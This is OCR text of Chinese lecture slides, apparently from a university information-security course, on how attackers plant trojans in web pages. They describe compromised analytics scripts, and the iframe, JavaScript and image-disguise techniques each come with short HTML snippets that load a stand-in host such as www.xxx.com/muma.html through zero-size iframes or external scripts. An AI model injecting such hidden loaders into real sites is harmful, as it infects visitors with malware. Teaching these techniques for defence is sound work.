上游充通大学 网页挂马的新方式 SHANGHAI JLAO TONG UNIVERSITY 被挂马网站是 第三方知名 “新形态”的网页挂马方式 “统计网站”编 入侵并挂马 写的用于收集 黑客 统计用户浏览 某“知名”统计网站被挂马 网页数据信息 的代码。黑客 正是利用了这 些统计网站进 行挂马,从而 使用该“知名”统计服务的所有网站全部被间接挂马 使得所有使用 了该统计代码 浏览 浏览 浏览 浏览 浏览 浏览 的网站全部都 要通 被间接挂马。 通 要 浏览上述网站的计算机可被感染多种病毒或木马 信息安全工程学院
信息安全工程学院 网页挂马的新方式 被挂马网站是 第三方知名 “统计网站”编 写的用于收集 统计用户浏览 网页数据信息 的代码。黑客 正是利用了这 些统计网站进 行挂马,从而 使得所有使用 了该统计代码 的网站全部都 被间接挂马
上游充通大学 网页挂马的关健技术 SHANGHAI JLAO TONG UNIVERSITY 框架挂马 js挂马 图片伪装挂马 ©网络钓鱼挂马 伪装挂马 信息安全工程学院
信息安全工程学院 网页挂马的关键技术 框架挂马 js挂马 图片伪装挂马 网络钓鱼挂马 伪装挂马
上游充通大学 框架挂马 SHANGHAI JLAO TONG UNIVERSITY 攻击者利用iframe语句,加载到任意网页中。是 最早也是最有效的的一种网络挂马技术。 代码如下: <iframe.src=http://www.xxx.com/muma.html width=0 height=0></iframe> 原理:在打开插入该句代码的网页后,也就打开 了http:/www.xx.com/muma.html页面,但是由 于它的长和宽都为“0”,所以很难察觉,非常具 有隐蔽性。 信息安全工程学院
信息安全工程学院 框架挂马 攻击者利用iframe语句,加载到任意网页中。是 最早也是最有效的的一种网络挂马技术。 代码如下: • <iframe. src=http://www.xxx.com/muma.html width=0 height=0></iframe> 原理:在打开插入该句代码的网页后,也就打开 了http://www.xxx.com/muma.html页面,但是由 于它的长和宽都为“0”,所以很难察觉,非常具 有隐蔽性
上游充通大学 js挂马 SHANGHAI JLAO TONG UNIVERSITY 利用js脚本调用进行的网页挂马技术。攻击者先 制作一个js文件,然后利用js代码调用到挂马的 网页。 代码如下: <script.language=javascript. src=http://www.xxx.com/gm.js></script> 原理:http:www.x.com/gm.js就是一个js脚本 文件,通过它调用和执行木马的服务端。这些j$ 文件一般都可以通过工具生成,攻击者只需输入 相关的选项就可以了。 信息安全工程学院
信息安全工程学院 js挂马 利用js脚本调用进行的网页挂马技术。攻击者先 制作一个.js文件,然后利用js代码调用到挂马的 网页。 代码如下: • <script. language=javascript. src=http://www.xxx.com/gm.js></script> 原理:http://www.xxx.com/gm.js就是一个js脚本 文件,通过它调用和执行木马的服务端。这些js 文件一般都可以通过工具生成,攻击者只需输入 相关的选项就可以了
上游充通大学 图片伪装挂马 SHANGHAI JLAO TONG UNIVERSITY 该技术用于逃避杀毒监视的技术。攻击者将类似: http:/ww.x.com/test.htm中的木马代码植入到test.gif 图片文件中。 ©代码: ·<html> <iframe.src="http://www.xxx.com/test.htm"height=0 width=0> </iframe> <img src="http://www.xxx.com/test.jpg"></center> </html> 原理:当用户打开http:/ww.xx.com/test.htm时,显示 给用户的是http:/www.xx.com/test.jpg,而 http:/www.x.com/test.htm网页代码也随之运行。 信息安全工程学院
信息安全工程学院 图片伪装挂马 该技术用于逃避杀毒监视的技术。攻击者将类似: http://www.xxx.com/test.htm中的木马代码植入到test.gif 图片文件中。 代码: • <html> • <iframe. src="http://www.xxx.com/test.htm" height=0 width=0> </iframe> • <img src="http://www.xxx.com/test.jpg"></center> • </html> 原理:当用户打开http://www.xxx.com/test.htm时,显示 给用户的是http://www.xxx.com/test.jpg,而 http://www.xxx.com/test.htm网页代码也随之运行